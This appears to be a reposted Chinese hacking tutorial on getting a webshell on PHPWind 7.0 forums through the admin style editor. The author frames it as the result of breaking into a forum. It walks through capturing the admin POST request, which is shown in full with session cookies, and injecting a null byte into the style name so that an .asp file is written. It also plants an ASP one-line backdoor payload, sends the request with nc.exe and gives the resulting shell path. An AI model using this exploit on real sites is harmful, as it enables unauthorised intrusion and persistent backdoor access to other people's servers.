欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

phpwin7.0拿shell的方法

程序员文章站 2022-06-28 09:27:28
事发一星期前,在入侵一个PHPWIND论坛时的成果,适用于PHPWIND不能上传,而网上盛传的三种拿SEHLL方法都无效,可以一试,应该算是PHPWIND后台的漏洞 准备工具:winsock专家 v0.6 betan1 一... 09-05-24...
事发一星期前,在入侵一个phpwind论坛时的成果,适用于phpwind不能上传,而网上盛传的三种拿sehll方法都无效,可以一试,应该算是phpwind后台的漏洞
准备工具:winsock专家 v0.6 betan1 一只;ue-32.exe一只;nc.exe一只,电脑一台(只见一堆砖头飞过。。。。)

开工了,首先打开winsock 然后启动ie,进入后台,(哪个又在丢砖头。。。)

进入风格插件>>>>风格模板>>>>添加风格.在第一项,此风格在image目录下的文件夹名称:填test或fuckcnn。。然后按提交。

然后点 [返 回 继 续 操 作] 找到刚才新建的风格,点编缉,
这里就要轮到winsock出场了...
打开ie进程抓包随便改点什么,如下面的98%改成97%.这里关键的是把数据包抓下来,其它的没所谓

一共二条数据如下:
1:
post /phpwind/upload/admin.php?adminjob=setstyles&verify=bb457aae& http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://x22222.h21.ttrr.com/phpwi ... n=edit&sid=test
accept-language: zh-cn
content-type: application/x-www-form-urlencoded
ua-cpu: x86
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; http://bsalsa.com) ; .net clr 2.0.50727)
host: x22222.h21.ttrr.com
content-length: 473
connection: keep-alive
cache-control: no-cache
cookie: 9f9e2_lastpos=t3; 9f9e2_ol_offset=97; 9f9e2_threadlog=%2c2%2c; 9f9e2_winduser=c20fagievabsv1ryuaqdvwicdvcaa1mdvwcgbwefuguabgg%3d; 9f9e2_ck_info=%2f%09; 9f9e2_lastvisit=7102%091208851845%09%2fphpwind%2fupload%2fread.php%3ftid%3d3; 9f9e2_ipfrom=32f09dc105198e55683b704b0f8fbc6b%09%b9%e3%b6%ab%ca%a1%0d; 9f9e2_readlog=%2c1%2c2%2c3%2c; 9f9e2_adskin=0; 9f9e2_cknum=cfzucggdvabsddtoa1zrb1vtcqvucgjvuwmgaqpxbgdcb1fwwwuhagfwvla%3d; 9f9e2_adminuser=cfzucggaxqvvbdsavv4mwmghwf0bblupuaztdqztbliavlcdxfigvfnwavfqufadbto%3d

2:
action=edit&step=3&sid=test&setting%5b0%5d=test&setting%5b1%5d=wind&setting%5b2%5d=1&setting%5b7%5d=97%25&setting%5b8%5d=98%25&setting%5b3%5d=%23fff&setting%5b4%5d=%232f5fa1&setting%5b5%5d=%23b6d9e3&setting%5b6%5d=%23d4eff7&setting%5b9%5d=%2376bac2&setting%5b10%5d=%2376bac2&setting%5b11%5d=%23005681&setting%5b12%5d=%235495a0&setting%5b13%5d=%23f7f7f7&setting%5b14%5d=%23d6e8cb&setting%5b15%5d=%23659b28&setting%5b16%5d=%23ffffff&setting%5b17%5d=%23f4fbff&setting%5b18%5d=
分别把他们存为a.txt和b.txt

重点到了,我们打开b.txt,把第三个参数sid=test改为test.aspa,在最后的参数改为setting%5b18%5d=%0d%0c%3c%25executeglobal+request%28%221%22%29%25%3e简化点就是[回车符]<%executeglobal request("1")%>

存盘,可以了,然后查看一下b.txt的大小530字节.套套是给他作好了,再给他带上看看,

好,现在我们把b.txt的内容复制到a.txt的最下面,再用ue-32打开a.txt,把下面这行content-length: 473改成content-length: 530,然后切换[到十六进制模式]把刚才修改的第三个参数sid=test.aspa改为sid=test.asp ,注意,这个 为十六进制的00 .存盘,

用nc.exe发送

ok,现在让我们上ftp看看有没有生成test.asp(当然,如果是入侵的话就直接用一句话客户端去连拉)

要记得你生成的文件在bbs.xxxxxxxxx.com/data/style/test.asp

总结:漏洞产生的原因是跟很久以前的动网上传漏洞一样,没有考滤00这个字节,当我们把生成文件参数后面加上00时,phpwind就以为程序结束,然后就会直接生成我们想要的asp.有很多人问,能不能直接生成php呢,这个我也一直在试,但都是没有办法,因为php会把我们输入的一句话包含到单引号里面,这样我们的一句话就不能执行了,而asp单引号不影响我们的执行,由于本人不懂php.所以不知道有没有其它的办法,希望本文丢(拋字怎么打也打不出来)砖引玉.让高手来解决这个问题